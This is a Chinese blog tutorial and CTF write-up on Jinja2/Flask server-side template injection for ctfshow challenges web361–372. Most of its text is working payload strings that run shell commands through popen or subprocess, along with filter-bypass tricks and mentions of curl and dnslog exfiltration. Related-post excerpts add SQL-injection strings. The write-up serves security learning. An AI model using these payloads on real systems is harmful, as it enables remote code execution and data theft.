web入门-ssti(已完结)
一.知识点
1.模板引擎
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。
模板引擎也会提供沙箱机制来进行漏洞防范,但是可以用沙箱逃逸技术来进行绕过。
简单来说就是模板提供位置,用户提供数据
2.SSTI
SSTI 就是服务器端模板注入(Server-Side Template Injection)
当前使用的一些框架,比如python的
flask,php的thinkphp,java的spring等一般都采用成熟的的MVC的模式,用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。漏洞成因就是服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。其影响范围主要取决于模版引擎的复杂性。
凡是使用模板的地方都可能会出现 SSTI 的问题,这里主要有两种模板渲染函数,render_template_string()与render_template(),其中render_template是用来渲染一个指定文件的,render_template_string()则是用来渲染字符串的。而渲染函数在渲染的时候,往往对用户输入的变量不做渲染,即:{{}}在Jinja2中作为变量包裹标识符,Jinja2在渲染的时候会把{{}}包裹的内容当做变量解析替换。比如{{2*2}}会被解析成4。因此才有了现在的模板注入漏洞。往往变量我们使用{{恶意代码}}。正因为{{}}包裹的东西会被解析,因此我们就可以实现类似于SQL注入的漏洞
3.举例
用以下代码进行本地演示
from flask import * |
此时可以看到当传参为user=yxing时将用户输入的yxing直接输出了,尝试输入变量来进行解析,比如user={{2*2}},就可以看到直接将变量解析后输出
那么我们主要就是利用变量的解析来实现任意命令执行了,下面来谈一下攻击方法
4.继承关系
在攻击过程就是通过不断继承来实现rce,所以这里先来讲下继承关系
首先先创建四个类,然后B继承了A,C继承了B,D继承了C,我们先新建一个C类的对象为c,就可以通过__class__魔术方法来找到它的当前类
然后可以使用__base__魔术方法来找到父类。注意,这里如果使用__bases__魔术方法,也会返回父类,只不过是以元组形式返回,即(<class '__main__.B'>,)
当然,支持多个__base__方法连在一起使用,可以看到返回了A类
在A类的基础上如果再使用__base__魔术方法理论来说是没有了,但是实际上会返回object类,这是所有子类的父类当我们创建一个类而没有显式地指定它继承的父类时,这个类就会默认继承object类,因此我们在添加一个__base__就能拿到object。当然,在object类再使用__base__魔术方法就会返回None
也可以使用__mro__魔术方法一次性输出所有类的父类
由于__mro__魔术方法是数组形式,所以加上下标就能实现读取指定的类
以上基础知识就讲完了,下面讲下攻击方法:
当我们拿到object类之后,那么就可以使用__subclasses__魔术方法(注意这里需要加()来实现返回列表)查找到object类全部的子类,其中包含了能实现rce的子类,那么同样通过下标去找到能够rce的子类
这里给出一个可以进行rce的子类<class 'os._wrap_close'>,先要找到这个类的位置,一般来说是139,但是具体情况具体分析,在终端中可以通过查找来快速确定位置,可以看到这里是第165项,由于第一项不算,所以查找第164项得到该类
然后先给这个类通过__init__这个初始化方法初始化
初始化之后通过__globals__魔术方法来返回当前类方法中的全局变量字典
可以看到有一些执行系统命令的全局变量,这里用popen函数来执行系统命令,在后面类似于下标加上名字即可找到对应函数并使用
随便执行一个系统命令,比如whoami,再使用.read()方法来读取,因为popen方法返回的是一个与子进程通信的对象,为了从该对象中获取子进程的输出,因此需要使用.read()方法来读取子进程的输出。
可以看到成功执行了,现在就可以进行rce了
5.方法
__class__:返回对象的类
__mro__:返回类的所有父类(表示类的方法解析顺序)(从当前类到object类)
__base__:返回类的直接父类
__bases__:返回类的直接父类(以元组形式)
__subclasses__():获取当前类的所有子类
__init__:类的初始化方法
__globals__:对包含(保存)函数全局变量的字典的引用
__getitem__:实现对对象的索引访问操作。对字典使用时,传入字符串返回字典相应键所对应的值;对列表使用时,传入整数返回列表对应索引的值。
__builtins__:包含了 Python 中所有内置的函数、变量和异常。因此常用来访问内置函数
get():获取字典中的值
lipsum():可以用于得到__builtins__,而且lipsum.__globals__含有os模块
6.过滤器
int():将值转换为int类型; |
7.实操
因为我们不知道有什么现成的类,因此我们可以直接使用下面这些来直接获取对应的类
''.__class__ |
这里的''和""都可以表示字符串,所以它们的就是表示字符串本身的<class 'str'>类。而(),[],{}分别代表元组,列表,字典的类
还是根据上面的那个例子来实操一下
user={{''.__class__}} |
user={{''.__class__.__base__}} |
user={{''.__class__.__base__ .__subclasses__()}} |
user={{''.__class__.__base__ .__subclasses__()}} |
user={{''.__class__.__base__ .__subclasses__()[164].__init__}} |
user={{''.__class__.__base__ .__subclasses__()[164].__init__.__globals__['popen']('whoami').read()}} |
可以看到成功执行了命令,但是在实际题目中payload不是一成不变的,需要根据题目具体分析
8.防御方法
不进行渲染直接通过占位传入数据,那么就可以避免模板注入的存在,比如如下
from flask import Flask, request |
9.常见payload
获得基类 |
10.绕过
数字绕过
四则运算
{{set num='aaaaaaaaaa'|length*'aaaaaaaaaaaaaa'|length-'aaaaaaaa'|length}},num的结果就为10*14-8,'a'|length就表示字符串的长度
''和""绕过
- 旁路注入:通过
GET/POST传参来代替引号内容
#GET方式,用request.args.参数 代替,然后用get传参 |
chr进行字符串拼接(注意:实际中不一定为第59个子类)
{%set chr=().__class__.__bases__.__getitem__(0).__subclasses__()[59].__init__.__globals__.__builtins__.chr%} |
- 手动构造char
user={%set char=config.__class__.__init__.__globals__.__builtins__.chr%}{{char(99)%2bchar(100)}} |
[]绕过
__getitem__绕过
__subclasses__().__getitem__(407)=__subclasses__()[407] |
_绕过
- 十六进制绕过(注意不用点连接了)
{{().__class__.__base__}}={{()["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fbase\x5f\x5f"]}} |
- 过滤器函数
attr(),将带下划线部分作为attr()函数的参数并使用GET或POST给attr()函数传参数
{{().__class__.__base__}} |
- pop方法动态调用(web369)
pop(index)是列表的内置方法,用于移除并返回列表中指定索引的元素。
{% set po=dict(po=a,p=a)|join%}{% set a=(()|select|string|list)|attr(po)(24)%} |
{ {} }绕过
- 通过
{%%}绕过
关键字绕过
- 旁路注入
- 双引号分割,比如
popen=p""open
11.题目知识点
其他执行rce的姿势
subprocess.Popen()子类(web362)
name={{().__class__.__mro__[1].__subclasses__()[407]("cat /flag",shell=True,stdout=-1).communicate()[0]}} |
_frozen_importlib_external.FileLoader子类(web362)
name={{"".__class__.__base__.__subclasses__()[94]["get_data"](0,"/flag")}} |
- 使用
flask内置的lipsum方法(更快获取popen方法)(web362)
name={{lipsum.__globals__.get('os').popen('cat /flag').read()}} |
{ {} }和{ % % }区别
{%%}是用来执行模板的控制逻辑,例如条件语句、循环、设置变量等,{{}}是用来将变量或表达式的结果输出到模板中的。注意:{{}} 是专门用于输出的,它只能将变量或表达式的结果插入到模板中,而不能执行逻辑控制。
二.题目
web361(无过滤)
题目提示名字就是考点,进去传个name=1就能正常输出,和之前演示的类似,就不重复了,反正还是需要一步步来
name={{''.__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('ls /').read()}} |
web362(过滤2,3等数字)
题目提示过滤,先进行测试
name={{''.__class__.__mro__[1].__subclasses__()}} |
既然前面已经使用了[]和1了,那就说明只可能是2,3进行了过滤,我们还是可用四则运算进行绕过
常规绕过
name={{''.__class__.__mro__[1].__subclasses__()[11*11%2b11]}} |
后面的方法就同理了
name={{''.__class__.__mro__[1].__subclasses__()[140-8].__init__.__globals__['popen']('ls /').read()}} |
其他子类
看wp发现还可以使用其他子类,比如
1.subprocess.Popen()
name={{().__class__.__mro__[1].__subclasses__()[407]("cat /flag",shell=True,stdout=-1).communicate()[0]}} |
shell=True表示命令会在系统的 shell 中执行stdout=-1试图捕获命令的输出.communicate()[0]:这是用于与子进程交互的方法,.communicate()通常用于获取子进程的输出,[0]表示获取输出的第一个元素,通常是标准输出的内容。
2._frozen_importlib_external.FileLoader
name={{"".__class__.__base__.__subclasses__()[94]["get_data"](0,"/flag")}} |
获取/flag目录下的数据
字符长度运算绕过
还可以使用其他绕过数字过滤的方式如下
{%set num='aaaaaaaaaa'|length*'aaaaaaaaaaaaaa'|length-'aaaaaaaa'|length%},num的结果就为10*14-8,'a'|length就表示字符串的长度
name={%set num='aaaaaaaaaa'|length*'aaaaaaaaaaaaaa'|length-'aaaaaaaa'|length%}{{''.__class__.__mro__[1].__subclasses__()[num].__init__.__globals__['popen']('tac /flag').read()}} |
注意这里只能使用{%%},而不能使用{{}},原因为前者是用来执行模板的控制逻辑,例如条件语句、循环、设置变量等,后者是用来将变量或表达式的结果输出到模板中的
lipsum方法
还可以使用lipsum方法,这个是flask内置的方法
name={{lipsum.__globals__.get('os').popen('cat /flag').read()}} |
web363(过滤’’和””)
还是先测一下
name={{''.__class__}} |
旁路注入
这里就要使用旁路注入,即通过GET/POST传参来代替引号内容
name={{().__class__.__base__.__subclasses__()[132].__init__.__globals__[request.args.a](request.args.b).read()}}&a=popen&b=tac /flag |
其他子类
也可以使用其他子类,比如
subprocess.Popen
name={{().__class__.__mro__[1].__subclasses__()[407](request.args.a,shell=True,stdout=-1).communicate()[0]}}&a=cat /flag |
web364(+args)
测试发现args被过滤,用旁路注入其他方法绕过
name={{().__class__.__base__.__subclasses__()[132].__init__.__globals__[args]}} |
request.values.参数
那么不一定用GET传参的args,可用GET/POST传参的values
name={{().__class__.__base__.__subclasses__()[132].__init__.__globals__[request.values.a](request.values.b).read()}}&a=popen&b=tac /flag |
注意这里GET方式可以打出来,但是POST请求方式被禁用了,再尝试下cookie打
request.cookies.参数
name={{().__class__.__base__.__subclasses__()[132].__init__.__globals__[request.cookies.a](request.cookies.b).read()}} |
web365(+[])
name={{().__class__.__base__.__subclasses__()[132]}} |
那么可用__getitem__魔术方法绕过,这里给出四种方法,但是都要使用__getitem__魔术方法
request.valuse.参数
注意这里在__globals__之后要使用__getitem__魔术方法将后面的popen('tac /flag')返回值
name={{().__class__.__base__.__subclasses__().__getitem__(132).__init__.__globals__.__getitem__(request.values.a)(request.values.b).read()}}&a=popen&b=tac /flag |
request.cookies.参数
name={{().__class__.__base__.__subclasses__().__getitem__(132).__init__.__globals__.__getitem__(request.cookies.a)(request.cookies.b).read()}} |
char方法拼接字符串绕过
name={%set char=config.__class__.__init__.__globals__.__builtins__.chr%}{{().__class__.__base__.__subclasses__().__getitem__(132).__init__.__globals__.popen(char(99)%2bchar(97)%2bchar(116)%2bchar(32)%2bchar(47)%2bchar(102)%2bchar(108)%2bchar(97)%2bchar(103)).read()}} |
给个字符串拼接的脚本
def string_to_char_ascii(input_string): |
subprocess.Popen子类
name={{().__class__.__base__.__subclasses__().__getitem__(407)(request.values.a,shell=True,stdout=-1).communicate().__getitem__(0)}}&a=cat /flag |
web366(+_)
name={{()}} |
那么通过attr()函数过滤器来绕过
attr()过滤器用于从对象中获取指定的属性值。它类似于 Python 中的点操作符(.),但只能获取对象的属性,而不会尝试查找字典中的键。
object:需要获取属性的对象。attribute_name:属性的名称,必须是一个字符串。
attr()过滤器绕过
name={{()|attr(request.values.a)|attr(request.values.b)|attr(request.values.c)()|attr(request.values.d)(132)|attr(request.values.e)|attr(request.values.f)|attr(request.values.g)(request.values.h)(request.values.i)|attr(request.values.j)()}}&a=__class__&b=__base__&c=__subclasses__&d=__getitem__&e=__init__&f=__globals__&g=__getitem__&h=popen&i=tac /flag&j=read |
虽然但是有点太多了,下面给个少点的
lipsum子类(更快获取popen方法)
name={{(lipsum|attr(request.values.a)).os.popen(request.values.b).read()}}&a=__globals__&b=tac /flag |
web367(+os)
限制了lipsum子类里面的os,其实也可以用旁路注入来着
attr()过滤器绕过
name={{()|attr(request.values.a)|attr(request.values.b)|attr(request.values.c)()|attr(request.values.d)(132)|attr(request.values.e)|attr(request.values.f)|attr(request.values.g)(request.values.h)(request.values.i)|attr(request.values.j)()}}&a=__class__&b=__base__&c=__subclasses__&d=__getitem__&e=__init__&f=__globals__&g=__getitem__&h=popen&i=tac /flag&j=read |
lipsum子类(通过get方法来旁路注入)
get方法通常用于从字典中安全地获取值
name={{((lipsum|attr(request.values.a)).get(request.values.b)).popen(request.values.c).read()}}&a=__globals__&b=os&c=tac /flag |
web368(+{ {} })
将{{}}替换为{%print()%}即可
attr()过滤器绕过
name={%print(()|attr(request.values.a)|attr(request.values.b)|attr(request.values.c)()|attr(request.values.d)(132)|attr(request.values.e)|attr(request.values.f)|attr(request.values.g)(request.values.h)(request.values.i)|attr(request.values.j)())%}&a=__class__&b=__base__&c=__subclasses__&d=__getitem__&e=__init__&f=__globals__&g=__getitem__&h=popen&i=tac /flag&j=read |
lipsum方法(通过get来旁路注入)
name={%print((lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read())%}&a=__globals__&b=os&c=tac /flag |
web369(+request)
过滤了request
变量重命名
通过构造字符实现最后读/flag,注意这里的+会被视为空格,所以要用%2b来绕过
name= |
下面逐行分析一下
name= |
给个构造的脚本
import re |
lipsum方法构造字符
原理同上,通过类似于(lipsum|string|list).pop(0)构造字符,这里的(lipsum|string|list)会返回['<', 'f', 'u', 'n', 'c', 't', 'i', 'o', 'n', ' ', 'g', 'e', 'n', 'e', 'r', 'a', 't', 'e', '_', 'l', 'o', 'r', 'e', 'm', '_', 'i', 'p', 's', 'u', 'm', ' ', 'a', 't', ' ', '0', 'x', '7', 'f', '2', 'd', '6', '4', '9', '9', '2', '5', '5', '0', '>']这个列表,通过这个列表来绕过
,注意前面必须要用括号包裹,两个字符之间用~连接
这里给一个脚本
import requests |
在分别获得对应字符串后组合起来就行
name={% print (lipsum|attr((config|string|list).pop(74).lower()~(config|string|list).pop(74).lower()~(config|string|list).pop(6).lower()~(config|string|list).pop(41).lower()~(config|string|list).pop(2).lower()~(config|string|list).pop(33).lower()~(config|string|list).pop(40).lower()~(config|string|list).pop(41).lower()~(config|string|list).pop(42).lower()~(config|string|list).pop(74).lower()~(config|string|list).pop(74).lower())).get((config|string|list).pop(2).lower()~(config|string|list).pop(42).lower()).popen((config|string|list).pop(1).lower()~(config|string|list).pop(40).lower()~(config|string|list).pop(23).lower()~(config|string|list).pop(7).lower()~(config|string|list).pop(279).lower()~(config|string|list).pop(4).lower()~(config|string|list).pop(41).lower()~(config|string|list).pop(40).lower()~(config|string|list).pop(6).lower()).read() %} |
web370(+数字)
将数字也过滤了
全角数字绕过
把payload里的数字换成对应的全角数字:
‘0’,’1’,’2’,’3’,’4’,’5’,’6’,’7’,’8’,’9’
name= |
构造数字
通过字符的个数来构造数字,比如ccccccccc=(dict(eeeeeeeee=a)|join|count),那么现在ccccccccc就代表9
name= |
curl外带
import requests |
先监听1223端口,再将获得的数据传参获得flag
web371(+print)
过滤print所以构造的方法都行不通了,只有打外带
curl外带
脚本同370
import requests |
dnslog外带
name= |
通过dns网站,刷新到一个没有数字的域名时替换15行的obtfwp
web372(+count)
将count过滤,用length替换即可
name= |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Yxing!
相关推荐
2025-03-05
ctfshow-web
web签到题(源码泄露)源码泄露,注释base64解码 web2(sql注入)简单sql注入,post传参username和password password=1&username=1' or 1=1# //回显欢迎你,ctfshowpassword=1&username=-1' or 1=1 order by 4# //无回显password=1&username=-1' or 1=1 order by 3# //回显欢迎你,ctfshowpassword=1&username=-1' union select 1,2,3# //回显2password=1&username=-1' union select 1,database(),3# //回显web2password=1&username=-1' union select 1,(select group_concat(table_name) from information_schema.tables...
2025-03-20
ctfshow-萌新-web
知识点在之前都学到了,现在就只是做题和补充 web1(php特性)<?php# 包含数据库连接文件include("config.php");# 判断get提交的参数id是否存在if(isset($_GET['id'])){ $id = $_GET['id']; # 判断id的值是否大于999 if(intval($id) > 999){ # id 大于 999 直接退出并返回错误 die("id error"); }else{ # id 小于 999 拼接sql语句 $sql = "select * from article where id = $id order by id limit 1 "; echo "执行的sql为:$sql<br>"; # 执行sql 语句 ...
2025-02-03
web入门-php特性
前言:这里有很多知识点,因此做题带着涨姿势,边做题边补充知识点 一.知识点intval()函数(web89)作用是 PHP 中用于将变量转换为整数的函数。它尝试从给定的变量中提取一个整数值。如果该变量不是整数类型,intval 会根据其内容进行适当的转换。 语法int intval ( mixed $var [, int $base = 10 ] ) $var:要转换的变量。 $base(可选):表示数字的进制,默认是 10 进制。如果指定了其他进制(如 8、16 等),函数会按照该进制进行转换。 返回值返回变量 var 的整数值。如果 var 是布尔值 false,则返回 0;如果是 true,则返回 1。 注意 如果字符串中包含数字和非数字字符,intval 只会提取开头的数字部分,直到遇到第一个非数字字符为止。 如果字符串中没有有效的数字,intval 将返回 0。 intval当传入的变量也是数组的时候,会返回1 base变量位的0表示根据var开始的数字决定使用的进制: 0x或0X开头使用十六进制,0开头使用八进制,否则使用十进制。...
2025-01-24
web入门-php反序列化
一.前置php知识1.类,对象,属性,方法类类(class)是一个共享相同结构和行为的对象的集合。每个类的定义都以关键字class开头,后面跟着类的名字。类本身不是实体,不能直接使用,必须通过实例化生成对象。 class MyClass { public $property1; //属性 public function method1() { //方法 // 方法体 }} 对象对象(object)是一个由信息及对信息进行处理的描述所组成的整体,是对现实世界的抽象。 每个对象可以有不同的属性值,但共享类中的方法。 对象之间相互独立,修改一个对象的属性不会影响其他对象。 可以调用类中的方法来执行特定的操作。 $object = new MyClass(); 属性属性(Property)是类的成员变量,用于存储对象的状态信息。有以下三种访问控制修饰符 public:公共属性,可以从类的外部直接访问。 class Car { public $color =...
2024-12-03
web入门-sql注入
一.原理攻击者在进行数据库查询时恶意构造查询语句,使得查询语句能够得到任意攻击者想要的信息(永远不要相信用户的输入) 二.类型按查询来分可分为字符型和数字型(主要区别是字符型需要闭合而数字型无闭合) 按注入方式可分为union注入、报错注入、盲注、文件上传注入等 判断有无注入首先在参数后加上单引号(无论字符型还是数字型都会因单引号个数不匹配报错) 判断注入类型1.输入and 1=1和and 1=2 若均为正常则为字符型,第二个报错即为数字型 2.输入id=1和id=2-1 若结果相同则为数字型,第二个不同则为字符型 以ctfshow171举例 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit...
2025-02-19
web入门-命令执行(已完结)
...